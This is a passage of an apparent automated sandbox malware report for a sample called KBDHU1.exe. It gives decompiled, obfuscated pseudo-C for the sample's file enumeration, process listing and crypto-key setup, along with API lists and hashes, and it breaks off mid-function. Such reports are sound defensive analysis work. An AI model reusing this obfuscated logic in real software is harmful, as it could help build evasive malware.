Opcode Fuzzy Hash: fb5c691f75b15feb2ccbf741d1f44a28753098d2d2750875f178abdc684f1894
Instruction Fuzzy Hash: D2315A71901219EFDB00DFA4C989EAEBBBCFF08701F10812AF845E7291D77899058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 02CB0B50, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 02CB0D00: lstrcpynW.KERNEL32(?,00000000,00000000,00000010,02CB0B7D,00000000), ref: 02CB0D15

RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 02CB0B88
RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 02CB0BBA
RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 02CB0BFB

Strings

PE, xrefs: 02CB0BBF

Memory Dump Source

Source File: 00000000.00000002.663754872.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cb0000_boI88C399w.jbxd

Similarity

API ID: MemoryMove$lstrcpyn
String ID: PE
API String ID: 2715459254-4258593460
Opcode ID: 86c93febc2e2e00710f2e2c5a94d8761f82566f57464499d5d71b1ff67ea6e92
Instruction ID: 1c6620d033c2d43fa23b96e4aa3bd8b6b3f1ac3b161dcd42edb440a61276ed70
Opcode Fuzzy Hash: 86c93febc2e2e00710f2e2c5a94d8761f82566f57464499d5d71b1ff67ea6e92
Instruction Fuzzy Hash: DB1194316447046ADA71A624CC90BFFA7ADDFC1361F008839F65597180EB76E94CDB93

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: KBDHU1.exe PID: 4780 Parent PID: 7052 KBDHU1.exeCOMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	99.9%
Signature Coverage:	4.3%
Total number of Nodes:	1314
Total number of Limit Nodes:	46

Executed Functions

Function 022E01F0, Relevance: 21.1, APIs: 14, Instructions: 125
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 022E0238

Part of subcall function 022E0D00: lstrcpynW.KERNEL32(?,00000000,00000000,00000010,022E0B7D,00000000), ref: 022E0D15

NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,?), ref: 022E0253
GetProcessHeap.KERNEL32(?,?,?), ref: 022E026E
HeapFree.KERNEL32(00000000,00000001,00000000,?,?,?), ref: 022E0277
GetProcessHeap.KERNEL32(?,?,?), ref: 022E027C
RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 022E0289
GetCurrentProcess.KERNEL32(?,?,?), ref: 022E0290
NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,?,?), ref: 022E02A3
RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 022E02CA
RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 022E02E1
RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 022E0303
RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 022E031A
RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 022E0331
RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 022E034C

Memory Dump Source

Source File: 00000005.00000002.906160821.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22e0000_KBDHU1.jbxd

Similarity

API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
String ID:
API String ID: 482429597-0
Opcode ID: 60e628d7cc09253e0528630b4ce1e61b0b5c367b47a99d01a60c75b6c5a8bef8
Instruction ID: 87735c3752edc71483cd3fa2d43bb2bb73eab39ec9b2e15b1d2d1997d9f58251
Opcode Fuzzy Hash: 60e628d7cc09253e0528630b4ce1e61b0b5c367b47a99d01a60c75b6c5a8bef8
Instruction Fuzzy Hash: 6E4124B15243047EDA10EBE1C840F6FB7EAEBC8710F908D1DB645B7244D6F5E6099BA2

Uniqueness

Uniqueness Score: -1.00%

Function 023438F0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E023438F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v524;
				short _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				signed int _t24;
				intOrPtr* _t28;
				intOrPtr _t33;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				signed int _t49;
				int _t55;
				void* _t58;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t100;

				_t93 = __ecx;
				_t97 = __edx;
				_v1640 = __ecx;
				_t22 = 0x1b0f738d;
				_t58 = _v1640;
				goto L1;
				do {
					while(1) {
						L1:
						_t100 = _t22 - 0xd5d5438;
						if(_t100 <= 0) {
							break;
						}
						if(_t22 == 0x1b0f738d) {
							_t22 = 0x1c39f1c;
							continue;
						} else {
							if(_t22 != 0x3aa0d798) {
								goto L6;
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t24 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t24 & 0xffb9c0ef) + 0x651b5f5;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L30:
										if(_t97 == 0) {
											goto L29;
										} else {
											_t96 = E023434C0(0x234d260);
											_t28 =  *0x234dc60;
											if(_t28 == 0) {
												_t28 = E02343E80(_t58, E02343F20(0xe66945e6), 0xcca28b0d, _t97);
												 *0x234dc60 = _t28;
											}
											 *_t28( &_v524, 0x104, _t96, _t93,  &(_v1636.cFileName));
											E023438F0( &_v524, _t97, _a4, _a8);
											_t98 = _t98 + 0x1c;
											E02343460(_t96);
											_t22 = 0x60b76e4;
										}
									} else {
										_t33 = _v1590;
										if(_t33 == 0 || _t33 == 0x2e && _v1588 == 0) {
											L29:
											_t22 = 0x60b76e4;
										} else {
											goto L30;
										}
									}
								}
								continue;
							}
						}
						L40:
					}
					if(_t100 == 0) {
						if( *0x234e004 == 0) {
							 *0x234e004 = E02343E80(_t58, E02343F20(0xbb398380), 0xf53ce71f, _t97);
						}
						_t35 = FindFirstFileW( &_v1044,  &_v1636); // executed
						_t58 = _t35;
						if(_t58 == 0xffffffff) {
							return _t35;
						} else {
							_t22 = 0x3aa0d798;
							goto L1;
						}
					} else {
						if(_t22 == 0x1c39f1c) {
							_t95 = E023434C0(0x234d240);
							_t39 =  *0x234dc60;
							if(_t39 == 0) {
								_t39 = E02343E80(_t58, E02343F20(0xe66945e6), 0xcca28b0d, _t97);
								 *0x234dc60 = _t39;
							}
							 *_t39( &_v1044, 0x104, _t95, _t93);
							_t41 =  *0x234dea8;
							_t98 = _t98 + 0x10;
							if(_t41 == 0) {
								_t41 = E02343E80(_t58, E02343F20(0xbb398380), 0x97f883e, _t97);
								 *0x234dea8 = _t41;
							}
							_t94 =  *_t41();
							_t43 =  *0x234e1a0;
							if(_t43 == 0) {
								_t43 = E02343E80(_t58, E02343F20(0xbb398380), 0x26c3f343, _t97);
								 *0x234e1a0 = _t43;
							}
							 *_t43(_t94, 0, _t95);
							_t93 = _v1652;
							_t22 = 0xd5d5438;
							goto L1;
						} else {
							if(_t22 == 0x60b76e4) {
								if( *0x234dfd4 == 0) {
									 *0x234dfd4 = E02343E80(_t58, E02343F20(0xbb398380), 0xd3e90d14, _t97);
								}
								_t49 = FindNextFileW(_t58,  &_v1636); // executed
								asm("sbb eax, eax");
								_t22 = ( ~_t49 & 0x344f21a3) + 0x651b5f5;
								goto L1;
							} else {
								if(_t22 == 0x651b5f5) {
									if( *0x234e064 == 0) {
										 *0x234e064 = E02343E80(_t58, E02343F20(0xbb398380), 0xa4a77084, _t97);
									}
									_t55 = FindClose(_t58); // executed
									return _t55;
								}
								goto L6;
							}
						}
					}
					goto L40;
					L6:
				} while (_t22 != 0x36605fc2);
				return _t22;
				goto L40;
			}

0x023438fa
0x023438fc
0x023438fe
0x02343902
0x02343907
0x0234390b
0x02343910
0x02343910
0x02343910
0x02343910
0x02343915
0x00000000
0x00000000
0x02343a79
0x02343b62
0x00000000
0x02343a7f
0x02343a84
0x00000000
0x02343a8a
0x02343a8f
0x02343b48
0x02343b51
0x02343b58
0x02343a95
0x02343a9b
0x02343abf
0x02343ac1
0x00000000
0x02343ac3
0x02343acd
0x02343acf
0x02343ad6
0x02343ae9
0x02343aee
0x02343aee
0x02343b07
0x02343b23
0x02343b28
0x02343b2d
0x02343b32
0x02343b32
0x02343a9d
0x02343a9d
0x02343aa5
0x02343ab5
0x02343ab5
0x00000000
0x00000000
0x00000000
0x02343aa5
0x02343a9b
0x00000000
0x02343a8f
0x02343a84
0x00000000
0x02343a79
0x0234391b
0x02343a33
0x02343a4b
0x02343a4b
0x02343a5d
0x02343a5f
0x02343a64
0x02343b9d
0x02343a6a
0x02343a6a
0x00000000
0x02343a6a
0x02343921
0x02343926
0x02343992
0x02343994
0x0234399b
0x023439ae
0x023439b3
0x023439b3
0x023439c7
0x023439c9
0x023439ce
0x023439d3
0x023439e6
0x023439eb
0x023439eb
0x023439f2
0x023439f4
0x023439fb
0x02343a0e
0x02343a13
0x02343a13
0x02343a1c
0x02343a1e
0x02343a22
0x00000000
0x02343928
0x0234392d
0x02343953
0x0234396b
0x0234396b
0x02343976
0x0234397a
0x02343981
0x00000000
0x0234392f
0x02343934
0x02343b73
0x02343b8b
0x02343b8b
0x02343b91
0x00000000
0x02343b91
0x00000000
0x02343934
0x0234392d
0x02343926
0x00000000
0x0234393a
0x0234393a
0x0234394b
0x00000000

APIs

FindNextFileW.KERNELBASE(?,?,00000000,0234998D,16BF64F2,00000001), ref: 02343976
FindFirstFileW.KERNELBASE(?,?,00000000,0234998D,16BF64F2,00000001), ref: 02343A5D
FindClose.KERNELBASE(?,00000000,0234998D,16BF64F2,00000001), ref: 02343B91

Strings

8T], xrefs: 02343A22
Ei, xrefs: 02343AD8
Ei, xrefs: 0234399D
., xrefs: 02343A95
8T], xrefs: 02343910

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$8T]$8T]$Ei$Ei
API String ID: 3541575487-3972632629
Opcode ID: dab969149af009eea248f93388ec76f2eed797899589b8a29eb8fd979750fb8d
Instruction ID: fb953d7b3b5cbd340902bd752920529ab24c5817125e60ddef929d90c291e2a9
Opcode Fuzzy Hash: dab969149af009eea248f93388ec76f2eed797899589b8a29eb8fd979750fb8d
Instruction Fuzzy Hash: 1151D676B44201A7DB38AA74984477B36EAABC0344F2409DDF946C7340EF36F95587E2

Uniqueness

Uniqueness Score: -1.00%

Function 02344CB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E02344CB0(intOrPtr* __ecx, void* __edx) {
				void* _v556;
				void* _v560;
				void* __ebx;
				void* _t5;
				signed int _t7;
				int _t13;
				signed int _t17;
				void* _t24;
				intOrPtr* _t27;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t47;

				_t44 = _v560;
				_t27 = __ecx;
				_t43 = __edx;
				_t5 = 0x166df8ad;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t5 - 0x31709247;
						if(_t47 > 0) {
							break;
						}
						if(_t47 == 0) {
							_t17 =  *_t27( &_v556, _t43);
							asm("sbb eax, eax");
							_t5 = ( ~_t17 & 0xfe0bf6b3) + 0x395ce26e;
							continue;
						} else {
							if(_t5 == 0x1c199) {
								_v556 = 0x22c;
								if( *0x234deb4 == 0) {
									 *0x234deb4 = E02343E80(_t27, E02343F20(0xbb398380), 0x6e59538e, _t45);
								}
								L13:
								_t7 = Process32NextW(_t44,  &_v556); // executed
								asm("sbb eax, eax");
								_t5 = ( ~_t7 & 0xf813afd9) + 0x395ce26e;
								continue;
							} else {
								if(_t5 == 0x71faaa2) {
									if( *0x234dbd8 == 0) {
										 *0x234dbd8 = E02343E80(_t27, E02343F20(0xbb398380), 0xc9ddf643, _t45);
									}
									_t24 = CreateToolhelp32Snapshot(2, 0); // executed
									_t44 = _t24;
									if(_t44 == 0xffffffff) {
										return _t24;
									} else {
										_t5 = 0x1c199;
										continue;
									}
								} else {
									if(_t5 != 0x166df8ad) {
										goto L17;
									} else {
										_t5 = 0x71faaa2;
										continue;
									}
								}
							}
						}
						L25:
					}
					if(_t5 == 0x3768d921) {
						if( *0x234decc == 0) {
							 *0x234decc = E02343E80(_t27, E02343F20(0xbb398380), 0xc021696d, _t45);
						}
						goto L13;
					} else {
						if(_t5 == 0x395ce26e) {
							if( *0x234dc70 == 0) {
								 *0x234dc70 = E02343E80(_t27, E02343F20(0xbb398380), 0x560d239b, _t45);
							}
							_t13 = FindCloseChangeNotification(_t44); // executed
							return _t13;
						}
						goto L17;
					}
					goto L25;
					L17:
				} while (_t5 != 0x3925027b);
				return _t5;
				goto L25;
			}

0x02344cb8
0x02344cbc
0x02344cbf
0x02344cc1
0x02344cc6
0x02344cd0
0x02344cd0
0x02344cd0
0x02344cd0
0x02344cd5
0x00000000
0x00000000
0x02344cdb
0x02344d8a
0x02344d8e
0x02344d95
0x00000000
0x02344ce1
0x02344ce6
0x02344d42
0x02344d4c
0x02344d64
0x02344d64
0x02344d69
0x02344d6f
0x02344d73
0x02344d7a
0x00000000
0x02344ce8
0x02344ced
0x02344d08
0x02344d20
0x02344d20
0x02344d29
0x02344d2b
0x02344d30
0x02344e18
0x02344d36
0x02344d36
0x00000000
0x02344d36
0x02344cef
0x02344cf4
0x00000000
0x02344cfa
0x02344cfa
0x00000000
0x02344cfa
0x02344cf4
0x02344ced
0x02344ce6
0x00000000
0x02344cdb
0x02344da4
0x02344dc9
0x02344de1
0x02344de1
0x00000000
0x02344da6
0x02344dab
0x02344def
0x02344e07
0x02344e07
0x02344e0d
0x00000000
0x02344e0d
0x00000000
0x02344dab
0x00000000
0x02344dad
0x02344dad
0x02344dc1
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02344D29
Process32NextW.KERNEL32(00000000,?,?,00000000,?), ref: 02344D6F
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?), ref: 02344E0D

Strings

n\9, xrefs: 02344DA6

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: ChangeCloseCreateFindNextNotificationProcess32SnapshotToolhelp32
String ID: n\9
API String ID: 1306606082-3894687320
Opcode ID: 41a40c664222374bcb3617c7b565a838a79eab19f8c3920790324c78f33b370b
Instruction ID: baf94d57c2d2a33e3434f29b96dcd6e3ee805f3e35ab50ac7871595baf88ed91
Opcode Fuzzy Hash: 41a40c664222374bcb3617c7b565a838a79eab19f8c3920790324c78f33b370b
Instruction Fuzzy Hash: D2318EA6B44201A7C7246AF9B45473E32DE9B81B08F1809FBE611C7281EF78FD9547E1

Uniqueness

Uniqueness Score: -1.00%

Function 02342650, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E02342650(intOrPtr* __ecx) {
				char _v4;
				char _v8;
				intOrPtr _v32;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t21;
				intOrPtr _t26;
				signed int _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t32;
				intOrPtr* _t33;
				intOrPtr* _t35;
				signed int _t36;
				intOrPtr* _t37;
				intOrPtr _t39;
				intOrPtr* _t42;
				void* _t52;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t69;
				intOrPtr _t76;
				intOrPtr* _t84;
				intOrPtr* _t85;
				intOrPtr* _t91;
				intOrPtr* _t96;
				signed int _t97;
				void* _t108;
				void* _t110;
				void* _t111;

				_t96 = __ecx;
				_t97 = 0x50194b2;
				goto L1;
				do {
					while(1) {
						L1:
						_t110 = _t97 - 0x1e656080;
						if(_t110 > 0) {
							break;
						}
						if(_t110 == 0) {
							_t84 =  *0x234dddc;
							__eflags = _t84;
							if(_t84 == 0) {
								_t84 = E02343E80(_t52, E02343F20(0x667fdee), 0x41956823, _t108);
								 *0x234dddc = _t84;
							}
							_t16 =  *0x234e2e4; // 0x78f028
							_t4 = _t16 + 0x18; // 0x78f040
							_t5 = _t16 + 8; // 0x32ef2a8, executed
							_t17 =  *_t84( *_t5, 0x8004, 0, 0, _t4); // executed
							__eflags = _t17;
							if(_t17 != 0) {
								return 1;
							} else {
								_t97 = 0x264cda0c;
								continue;
							}
						} else {
							_t111 = _t97 - 0xf71ec4a;
							if(_t111 > 0) {
								__eflags = _t97 - 0x1032ae84;
								if(_t97 == 0x1032ae84) {
									_t21 =  *0x234dccc; // 0x0
									__eflags = _t21;
									if(_t21 == 0) {
										_t21 = E02343E80(_t52, E02343F20(0x667fdee), 0x60964008, _t108);
										 *0x234dccc = _t21;
									}
									_t57 =  *0x234e2e4; // 0x78f028
									_t3 = _t57 + 0x1c; // 0x790110
									 *_t21( *_t3);
									_t97 = 0x20769828;
									continue;
								} else {
									__eflags = _t97 - 0x17703602;
									if(_t97 == 0x17703602) {
										_t60 =  *0x234e2e4; // 0x78f028
										E02344250(_t52, _t60);
										__eflags = 0;
										return 0;
									} else {
										goto L17;
									}
								}
							} else {
								if(_t111 == 0) {
									_t85 =  *0x234e13c;
									__eflags = _t85;
									if(_t85 == 0) {
										_t85 = E02343E80(_t52, E02343F20(0x667fdee), 0x5f84d0c6, _t108);
										 *0x234e13c = _t85;
									}
									_t26 =  *0x234e2e4; // 0x78f028
									_t1 = _t26 + 0x20; // 0x78f048
									_t2 = _t26 + 8; // 0x32ef2a8, executed
									_t27 =  *_t85( *_t2, 0x660e, 1, _t1); // executed
									asm("sbb esi, esi");
									_t97 = ( ~_t27 & 0x0e32b1fc) + 0x1032ae84;
									continue;
								} else {
									if(_t97 == 0x50194b2) {
										_t30 = E023442F0(_t52, 0x24);
										 *0x234e2e4 = _t30;
										__eflags = _t30;
										if(_t30 == 0) {
											goto L18;
										} else {
											_t97 = 0x85ecca9;
											continue;
										}
									} else {
										if(_t97 != 0x85ecca9) {
											goto L17;
										} else {
											_t31 =  *0x234dee8;
											if(_t31 == 0) {
												_t31 = E02343E80(_t52, E02343F20(0x667fdee), 0x249f770b, _t108);
												 *0x234dee8 = _t31;
											}
											_t65 =  *0x234e2e4; // 0x78f028
											_t32 =  *_t31(_t65 + 8, 0, 0, 0x18, 0xf0000040); // executed
											asm("sbb esi, esi");
											_t97 = ( ~_t32 & 0x0cc3aa0b) + 0x17703602;
											continue;
										}
									}
								}
							}
						}
						L47:
					}
					__eflags = _t97 - 0x2433e00d;
					if(__eflags > 0) {
						__eflags = _t97 - 0x264cda0c;
						if(_t97 != 0x264cda0c) {
							goto L17;
						} else {
							_t33 =  *0x234dccc; // 0x0
							__eflags = _t33;
							if(_t33 == 0) {
								_t33 = E02343E80(_t52, E02343F20(0x667fdee), 0x60964008, _t108);
								 *0x234dccc = _t33;
							}
							_t69 =  *0x234e2e4; // 0x78f028
							_t15 = _t69 + 0x20; // 0x78fc90
							 *_t33( *_t15);
							_t97 = 0x1032ae84;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t35 =  *0x234e04c;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E02343E80(_t52, E02343F20(0x38bb5311), 0xa8366e55, _t108);
								 *0x234e04c = _t35;
							}
							_t36 =  *_t35(0x10001, 0x13,  *_t96,  *((intOrPtr*)(_t96 + 4)), 0x8000, 0,  &_v8,  &_v4); // executed
							asm("sbb esi, esi");
							_t97 = ( ~_t36 & 0x029e39b6) + 0x20769828;
							goto L1;
						} else {
							__eflags = _t97 - 0x20769828;
							if(_t97 == 0x20769828) {
								_t37 =  *0x234e084; // 0x0
								__eflags = _t37;
								if(_t37 == 0) {
									_t37 = E02343E80(_t52, E02343F20(0x667fdee), 0x476fbf6d, _t108);
									 *0x234e084 = _t37;
								}
								_t76 =  *0x234e2e4; // 0x78f028
								_t11 = _t76 + 8; // 0x32ef2a8
								 *_t37( *_t11, 0);
								_t97 = 0x17703602;
								goto L1;
							} else {
								__eflags = _t97 - 0x2314d1de;
								if(_t97 == 0x2314d1de) {
									_t91 =  *0x234ddfc;
									__eflags = _t91;
									if(_t91 == 0) {
										_t91 = E02343E80(_t52, E02343F20(0x667fdee), 0xaba13237, _t108);
										 *0x234ddfc = _t91;
									}
									_t39 =  *0x234e2e4; // 0x78f028
									_t6 = _t39 + 0x1c; // 0x78f044
									_t9 = _t39 + 8; // 0x32ef2a8, executed
									 *_t91( *_t9, _v8, _v4, 0, 0, _t6); // executed
									asm("sbb esi, esi");
									_t42 =  *0x234dd40;
									_t97 = (_t97 & 0xeefb5422) + 0x20769828;
									__eflags = _t42;
									if(_t42 == 0) {
										_t42 = E02343E80(_t52, E02343F20(0xbb398380), 0x7f92dfac, _t108);
										 *0x234dd40 = _t42;
									}
									 *_t42(_v32);
								}
								goto L17;
							}
						}
					}
					goto L47;
					L17:
					__eflags = _t97 - 0x16a1826b;
				} while (_t97 != 0x16a1826b);
				L18:
				__eflags = 0;
				return 0;
				goto L47;
			}

0x02342655
0x02342657
0x02342657
0x02342660
0x02342660
0x02342660
0x02342660
0x02342666
0x00000000
0x00000000
0x0234266c
0x023427bc
0x023427c2
0x023427c4
0x023427dc
0x023427de
0x023427de
0x023427e4
0x023427e9
0x023427f6
0x023427f9
0x023427fb
0x023427fd
0x023429af
0x02342803
0x02342803
0x00000000
0x02342803
0x02342672
0x02342672
0x02342678
0x0234275b
0x02342761
0x02342783
0x02342788
0x0234278a
0x0234279d
0x023427a2
0x023427a2
0x023427a7
0x023427ad
0x023427b0
0x023427b2
0x00000000
0x02342763
0x02342763
0x02342769
0x02342992
0x02342998
0x0234299e
0x023429a4
0x00000000
0x00000000
0x00000000
0x02342769
0x0234267e
0x0234267e
0x02342707
0x0234270d
0x0234270f
0x02342727
0x02342729
0x02342729
0x0234272f
0x02342734
0x0234273f
0x02342742
0x02342748
0x02342750
0x00000000
0x02342684
0x0234268a
0x023426ef
0x023426f4
0x023426f9
0x023426fb
0x00000000
0x023426fd
0x023426fd
0x00000000
0x023426fd
0x0234268c
0x02342692
0x00000000
0x02342698
0x02342698
0x0234269f
0x023426b2
0x023426b7
0x023426b7
0x023426bc
0x023426d1
0x023426d7
0x023426df
0x00000000
0x023426df
0x02342692
0x0234268a
0x0234267e
0x02342678
0x00000000
0x0234266c
0x0234280d
0x02342813
0x0234294d
0x02342953
0x00000000
0x02342959
0x02342959
0x0234295e
0x02342960
0x02342973
0x02342978
0x02342978
0x0234297d
0x02342983
0x02342986
0x02342988
0x00000000
0x02342988
0x02342819
0x02342819
0x023428f3
0x023428f8
0x023428fa
0x0234290d
0x02342912
0x02342912
0x02342934
0x0234293a
0x02342942
0x00000000
0x0234281f
0x0234281f
0x02342825
0x023428b8
0x023428bd
0x023428bf
0x023428d2
0x023428d7
0x023428d7
0x023428dc
0x023428e4
0x023428e7
0x023428e9
0x00000000
0x0234282b
0x0234282b
0x02342831
0x02342837
0x0234283d
0x0234283f
0x02342857
0x02342859
0x02342859
0x0234285f
0x02342864
0x02342874
0x02342877
0x0234287b
0x0234287d
0x02342888
0x0234288e
0x02342890
0x023428a3
0x023428a8
0x023428a8
0x023428b1
0x023428b1
0x00000000
0x02342831
0x02342825
0x02342819
0x00000000
0x0234276f
0x0234276f
0x0234276f
0x0234277c
0x0234277c
0x02342782
0x00000000

APIs

CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?,?), ref: 02342934

Strings

3$, xrefs: 0234280D

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: CryptDecodeObject
String ID: 3$
API String ID: 1207547050-3878113309
Opcode ID: 5df84aae4b5ebce8b7ec4b07ca0c181dd808d03c6beadcb6d80bc2d1aac2e68d
Instruction ID: 1ab76c9550191c4d131c710f0e3b2cb49cd1b530621f13c36c92c080d5e451b1
Opcode Fuzzy Hash: 5df84aae4b5ebce8b7ec4b07ca0c181dd808d03c6beadcb6d80bc2d1aac2e68d
Instruction Fuzzy Hash: D4713976F402119BCB28AB69DC50F6B36E7BB84704F1145E9FD06EB264EE60BC118BC1

Uniqueness

Uniqueness Score: -1.00%

Function 02348240, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E02348240(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t86;
				intOrPtr* _t88;
				void* _t100;
				void* _t101;
				intOrPtr* _t103;
				intOrPtr* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				unsigned int _t138;
				void* _t140;
				void* _t141;
				signed int _t142;
				intOrPtr _t144;
				void* _t145;
				void* _t148;

				_t145 = __ebp;
				_t112 = __ebx;
				_v592 = 0xe2e3;
				_v592 = _v592 ^ 0xd0dd7a16;
				_t142 = 0x20540118;
				_v592 = _v592 * 0x3d;
				_v592 = _v592 | 0xc45f2d48;
				_v592 = _v592 + 0xffffa838;
				_v592 = _v592 + 0xde6b;
				_v592 = _v592 ^ 0xf67dff2c;
				_v592 = _v592 + _v592 * 4 << 2;
				_v592 = _v592 ^ 0xf4577600;
				_v584 = 0xc2f;
				_v584 = _v584 << 0xb;
				_v584 = _v584 * 0x17;
				_v584 = _v584 >> 8;
				_v584 = _v584 ^ 0x0008c1c9;
				_v580 = 0xfdf2;
				_v580 = _v580 << 7;
				_v580 = _v580 ^ 0x007ef903;
				_v588 = 0xe94a;
				_v588 = _v588 ^ 0xa24bbed7;
				_v588 = _v588 | 0x3a5f93cf;
				_t113 = _v588;
				_t141 = _v580;
				_v588 = (_v588 - (0x2c9fb4d9 * _t113 >> 0x20) >> 1) + (0x2c9fb4d9 * _t113 >> 0x20) >> 6;
				_v588 = _v588 | 0xa489ddc5;
				_v588 = _v588 + 0xf775;
				_t138 = 0x1b4e81b5 * _v588 >> 0x20 >> 3;
				_v588 = _t138;
				_v588 = _v588 ^ 0x0235bf01;
				while(1) {
					L1:
					_t148 = _t142 - 0x17c5ef14;
					if(_t148 > 0) {
						break;
					}
					if(_t148 == 0) {
						_t86 =  *0x234dfec;
						__eflags = _t86;
						if(_t86 == 0) {
							_t111 = E02343F20(0xbb398380);
							_t138 = 0xd4fa8936;
							_t86 = E02343E80(_t112, _t111, 0xd4fa8936, _t145);
							 *0x234dfec = _t86;
						}
						 *_t86( &_v572);
						_t142 = 0x2295af4;
						continue;
					} else {
						if(_t142 == 0xa7036f) {
							_t88 =  *0x234de58;
							__eflags = _t88;
							if(_t88 == 0) {
								_t110 = E02343F20(0xbb398380);
								_t138 = 0xb1aefb5;
								_t88 = E02343E80(_t112, _t110, 0xb1aefb5, _t145);
								 *0x234de58 = _t88;
							}
							 *_t88(0,  &_v524, 0x104);
							_t142 = 0xfef53a6;
							continue;
						} else {
							if(_t142 == 0x2295af4) {
								_v580 = 0xa8c00;
								_v576 = 0;
								_v596 = E0234B590(_v580, _v576, 0x989680, 0);
								_v592 = _t138;
								_t140 = _v588 - _v564;
								_t144 = _v596;
								asm("sbb ecx, [esp+0x3c]");
								__eflags = _v584 - _v592;
								if(__eflags < 0) {
									goto L24;
								} else {
									if(__eflags > 0) {
										L29:
										return 1;
									} else {
										__eflags = _t140 - _t144;
										if(_t140 < _t144) {
											goto L24;
										} else {
											goto L29;
										}
									}
								}
							} else {
								if(_t142 != 0xfef53a6) {
									L23:
									__eflags = _t142 - 0x2ffd856e;
									if(_t142 != 0x2ffd856e) {
										continue;
									} else {
										goto L24;
									}
								} else {
									if( *0x234dfbc == 0) {
										_t101 = E02343F20(0xbb398380);
										_t138 = 0xc0be2284;
										 *0x234dfbc = E02343E80(_t112, _t101, 0xc0be2284, _t145);
									}
									_t100 = CreateFileW( &_v524, _v592, _v584, 0, _v580, _v588, 0); // executed
									_t141 = _t100;
									if(_t141 == 0xffffffff) {
										L24:
										__eflags = 0;
